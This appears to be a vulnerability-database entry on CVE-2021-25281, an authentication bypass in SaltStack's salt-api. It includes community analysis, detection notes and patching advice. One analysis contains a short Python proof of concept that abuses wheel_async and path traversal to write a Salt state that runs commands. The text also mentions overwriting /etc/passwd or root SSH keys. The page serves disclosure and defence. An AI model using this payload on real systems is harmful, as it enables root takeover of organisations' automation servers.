High
CVE-2021-25281
CVE-2021-25281
Description
An issue was discovered in through SaltStack Salt before 3002.5. salt-api does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.
Add Assessment
Technical Analysis
Vulnerability
https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/
This vulnerability is an Auth bypass in the SaltStack API, specifically, when making requests to the wheel_async client no checks are made to verify the requester is authenticated.
Salt stack is commonly used to automate CI/CD tasks and control the installation of software and packages across large organisations, which makes this an interesting target for attackers. The API is not started by default and is an optional component that may limit the attack surface for organisations.
Exploiting
This is fairly trivial to exploit in order to run jobs against the salt master, however, there are some limitation in what actions you can perform. There is no cmd execution function.
a very simple example
import requests response = requests.post( 'https://127.0.0.1:8000/run', verify=False, json={ 'eauth': 'auto', 'client': 'wheel_async', 'fun': 'pillar_roots.write', 'data': '{{ salt["cmd.run"]("id > /tmp/whoami") }}', 'path': '../../../../../../srv/salt/pwn.sls', }, ) if json := response.json(): print(f'Got JID: {json["return"][0]["jid"]}, the task was queued successfully')
You can edit the salt master configuration variables which include the ability to set the auth_mode and sharedsecrets if the API is restarted your changes take effect at which point you gain the ability to execute code against the master.
You can pair this with a path traversal vulnerability that was patched at the same time to gain file write into the OS. The default installation on Ubuntu the API runs as root so you can use actions like editing /etc/passwd or writing ssh-keys to /root/.ssh/id_rsa
POC available at https://github.com/Immersive-Labs-Sec/CVE-2021-25281
Detection
The API typically runs on HTTPS so unless you are inspecting SSL this may be difficult to detect with traditional packet analysis.
As this is exploiting the async functionality every request to the instance will create a salt job. Salt stores the input and output of every job on disk so can be easy to review post compromise activity.
More details can be found in this article – https://www.immersivelabs.com/resources/blog/how-to-lock-onto-the-hackers-targeting-saltstack-minions/
Patching
Patches are available for this both from Salt and most package providers. Hardening your instance to prevent access from untrusted IPs can also reduce the risk.
Technical Analysis
An exploit module that leverages both this authentication bypass and a directory traversal vulnerability identified as CVE-2021-25282 has been added to Metasploit recently. It allows an attacker to execute commands remotely on the master as the root user.
This module takes advantage of a Maintenance Process Check that is executed every 60 seconds by default. This process reloads and executes all the grains on the master, including custom grain modules in the Extension Module directory. Code execution is achieved by sending a request to the wheel_async client, abusing the directory traversal issue in the path parameter, as described in @kevthehermit’s assessment. A malicious Python script is placed in the Extension Module directory (default is /var/cache/salt/master/extmods/), waiting for the Maintenance Process Check to execute it.
Note that this attack can leave some traces in logs if the log level is set to debug or trace.
CVSS V3 Severity and Metrics
General Information
Vendors
- debian,
- fedoraproject,
- saltstack
Products
- debian linux 10.0,
- debian linux 11.0,
- debian linux 9.0,
- fedora 32,
- fedora 33,
- fedora 34,
- salt
Metasploit Modules
References
Advisory
This is great, we were casually looking at this, too, but you’ve done the work for us!